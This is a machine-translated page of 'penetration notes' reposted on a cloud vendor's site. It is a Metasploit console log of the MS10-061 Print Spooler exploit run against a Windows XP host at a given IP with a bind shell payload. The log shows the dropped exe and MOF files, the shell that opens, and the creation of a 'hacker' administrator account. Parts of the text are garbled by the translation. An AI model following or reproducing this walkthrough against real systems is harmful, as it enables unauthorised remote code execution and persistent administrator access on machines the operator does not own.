Penetration notes -2013-07-13 MS10_061

Penetration notes -2013-07-13 MS10_061_SPOOLSS

Last Update:2016-12-28 Source: Internet

Author: User

Tags cve mitre

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

[*] Please wait while the Metasploit Pro Console initializes ... [*] Starting Metasploit Console ... Mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmm mmmmmmmmmm mmmn$ vmmmm mmmnl MMMMM MMMMM jmmmm MMMNl MMMMMMMN NMMMMMMM J MMMM mmmnl mmmmmmmmmnmmmnmmmmmmmmm jmmmm mmmni mmmmmmmmmmmmmmmmmmmmmmm jmmmm mmmni mmmmmmmmmmmmmmmmmmmmmmm JMMMM MMMNI MM MMM mmmmmmm MMMMM jmmmm mmmni MMMMM mmmmmmm MMMMM jmmmm mmmni mmmnm mmmmmmm MMMMM jmmmm mmmni wmmmm mmmmmmm mmmm# jmmmm MM Mmr? MMNM MMMMM. Dmmmm mmmmnm '? MMM MMMM ' dmmmmm mmmmmmn? mm mm? Nmmmmmn mmmmmmmmne jmmmmmnmmm mmmmmmmmmmnm, emmmmmnmmnmm mmmmnnmnmmmmmnx mmmmmmnmmnmmnm MMMMMMMMNMMNMMMMm+. +MMNMMNMNMMNMMNMM =[Metasploit V4.4.0-dev [core:4.4 api:1.0] +----=[840 exploits-495 auxiliary-146 post +----=[ payloads-27 encoders-8 Nops [*] successfully loaded Plugin:pro MSF > Search ms10_061 Matching Modules ======== ======== Name Disclosure Date Rank Description----------------------------------Exploit/windows/smb/ms10_061_spoolSS 2010-09-14 Excellent Microsoft Print Spooler Service Impersonation Vulnerability MSF > use exploit/windows/smb/ms10_ 061_SPOOLSS MSF exploit (MS10_061_SPOOLSS) > Info name:microsoft Print Spooler Service Impersonation Vulnerability Modu LE:EXPLOIT/WINDOWS/SMB/MS10_061_SPOOLSS version:14976 platform:windows privileged:yes license:metasploit Framework L  Icense (BSD) Rank:excellent provided By:jduck<Jduck@metasploit. com>HDM<HDM@metasploit. com> Available targets:id Name------0 Windows Universal Basic options:name current Setting Required Description-------- ------------------------------PNAME No the printer share name to use on the target RHOST yes the target address Rport 4  Yes Set the SMB service port Smbpipe spoolss No The named pipe for the spooler service Payload information:space:1024 avoid:0 characters description:this module exploits the RPC Service impersonation vulnerability detailed in Microsoft B Ulletin ms10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler ser Vice to create a file. The working directory at the time is%SystemRoot%\System32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management InstrumentatioN (WMI) to deploy applications. This directory (WBEM\MOF) is periodically scanned and any of the new Mof files are processed automatically. This was the same technique employed by the Stuxnet code found in the wild. references:http://www.osvdb.org/67988 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729/HTTP Www.microsoft.com/technet/security/bulletin/MS10-061.mspx MSF exploit (MS10_061_SPOOLSS) > Set RHOST 142.168.2.20 RHOST = 142.168.2.20 MSF exploit (MS10_061_SPOOLSS) > Set PAYLOAD windows/shell/bind_tcp PAYLOAD = Windows/shel L/bind_tcp MSF exploit (MS10_061_SPOOLSS) > Info name:microsoft Print Spooler Service Impersonation Vulnerability Modul E:EXPLOIT/WINDOWS/SMB/MS10_061_SPOOLSS version:14976 platform:windows privileged:yes license:metasploit Framework Li  Cense (BSD) Rank:excellent provided By:jduck<Jduck@metasploit. com>HDM<HDM@metasploit. com> Available targets:id Name------0 Windows Universal Basic options:name current Setting Required Description-------- ------------------------------PNAME No the printer share name to use on the target RHOST 142.168.2.20 yes the target ad Dress Rport 445 Yes Set the SMB service port Smbpipe spoolss No The named pipe for the spooler service Payload information : space:1024 avoid:0 characters description:this module exploits the RPC Service Impersonation Vulnerability Detailed I n Microsoft Bulletin ms10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler ser Vice to create a file. The working directory at the time is%SystemRoot%\System32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management INstrumentation (WMI) to deploy applications. This directory (WBEM\MOF) is periodically scanned and any of the new Mof files are processed automatically. This was the same technique employed by the Stuxnet code found in the wild. references:http://www.osvdb.org/67988 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729/HTTP Www.microsoft.com/technet/security/bulletin/MS10-061.mspx MSF exploit (MS10_061_SPOOLSS) > exploit [*] Started Bind Handler [*] Trying target Windows Universal ... [*] Binding to 12345678-1234-ABCD-EF00-0123456789AB:[EMAIL&NBSP;PROTECTED]_NP:142.168.2.20[\SPOOLSS] ... [*] Bound to 12345678-1234-ABCD-EF00-0123456789AB:[EMAIL&NBSP;PROTECTED]_NP:142.168.2.20[\SPOOLSS] ... [*] Attempting to exploit ms10-061 via \\142.168.2.20\SmartPrinter ... [*] Printer handle:00000000950606c7fee7b348bc5b841597479b61 [*] Job started:0x4 [*] wrote 73802 bytes to%SystemRoot%\System 32\9o43idgkle0sju.exe [*] Job started:0x5 [*] wrote 2224 bytes to%SYSTEMROOT%\SYSTEM32\WBEM\MOF\VWMBWPPJt8k6ad.mof [*] Everything should is set, waiting for a session ... [*] Sending stage (bytes) to 142.168.2.20 Microsoft Windows XP [???? 5.1.2600] (C)???????? 1985-2001 Microsoft Corp c:\windows\system32>net user net user \ \?????????? -------------------------------------------------------------------------------Administrator Guest HelpAssistant IUSR_INTRA-PC iwam_intra-pc Shentouceshiwy Support_388945a0???????????????????????????????????? C:\windows\system32>net user Hacker 123/add & net localgroup Administrators hacker/add net user hacker 123/add & Amp net localgroup Administrators Hacker/add?????????????? ?????????????? C:\windows\system32>net user net user \ \?????????? -------------------------------------------------------------------------------Administrator Guest Hacker HelpAssistant iusr_intra-pc iwam_intra-pc Shentouceshiwy support_388945a0???????????????????????????????????? C:\windows\system32>

Penetration notes -2013-07-13 MS10_061_SPOOLSS

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More